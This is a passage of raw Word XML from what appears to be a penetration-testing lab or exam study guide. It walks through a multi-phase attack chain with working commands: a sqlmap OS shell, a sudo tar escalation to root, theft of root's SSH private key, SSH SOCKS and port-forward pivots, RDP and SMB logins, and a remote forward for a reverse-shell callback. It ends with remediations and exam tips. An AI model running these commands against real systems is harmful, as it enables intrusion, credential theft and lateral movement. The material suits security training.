      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> yields a shell as </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AA46DD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -u "http://10.10.10.10/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>item?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>=1" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">-shell     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># or a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566D51AB" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">id   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE2EE9A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 — Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> → root.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> shows a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>-abusable binary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE86FD9" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -l                          </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># (root) NOPASSWD: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/bin/tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2617B2DF" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>cf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># -&gt; root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7635E316" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>cat /root/.ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">/hosts    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># loot a key + internal names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C55A72D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> a                             </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># eth1 172.16.20.10 -&gt; internal 172.16.20.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB1747" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 3 — SSH pivot (dynamic SOCKS) into tier-2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> Use the looted key (or add yours) to open a dynamic tunnel through the pivot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B8E5E5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># from ATTACKER, using the pivot as the SSH server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5859A1" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>ssh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>loot_id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>fN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -D 1080 root@10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377374B8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; socks5 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63517ACD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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -p 22,445,3389 172.16.20.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E10102" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 4 — Internal target + local forward for a specific service.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> A tier-2 host </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.20.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> exposes RDP; forward it for direct access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF09134" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>ssh -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>loot_id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -L 33389:172.16.20.20:3389 root@10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF4BD0" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /v:127.0.0.1:33389 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>u:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> /p:'Passw0rd!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0C2ED2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># or over SOCKS: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.16.20.20 -u admin -p 'Passw0rd!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D1A55" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 5 — Double pivot (remote forward for a deep callback).</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.20.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> reaches tier-3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.30.0/24</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> but that segment can't reach you — use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote forward</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> so a tier-3 reverse shell routes back through the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F982C3B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># nested: from a shell on 172.16.20.20, SSH to it and remote-forward your handler inward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5CF36" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">ssh -R 4444:127.0.0.1:4444 user@172.16.20.20     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># tier-3 host -&gt; 172.16.20.20:4444 -&gt; attacker:4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B4D84" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 172.16.30.30            </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># enumerate tier-3 over the chained SOCKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E9A761" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain summary:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> service exploit → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> tar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> → looted SSH key → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH dynamic SOCKS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> into tier-2 → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local forward</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> to RDP → </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote forward</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> for a tier-3 callback (double pivot). Remediations: patch the service, remove the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> tar</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> NOPASSWD, protect private keys, segment the DMZ NIC, restrict RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC719B1" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="2689AB52">
          <v:rect id="_x0000_i1210" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="243172E5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>23. Common Pitfalls &amp; Time Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18117BA2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timebox each range.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> If a foothold stalls, move on — partial completion across ranges still scores. Come back with fresh eyes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C0B16B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumerate NICs immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> on every shell (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ipconfig /all</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>) — missing a second interface means missing the whole next segment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08633F39" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> over SOCKS needs -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (no SYN/ping through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>) — a "nothing's up" result over a pivot is usually this mistake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627D302B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keep reverse-shell callbacks in-segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> — set </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> to the pivot's internal NIC or use a remote forward; a callback to your external IP won't route from a deep segment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ADBFE1" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test tunnels with one known port</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> curl http://&lt;host&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>) before launching big scans — saves chasing phantom failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA707E8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
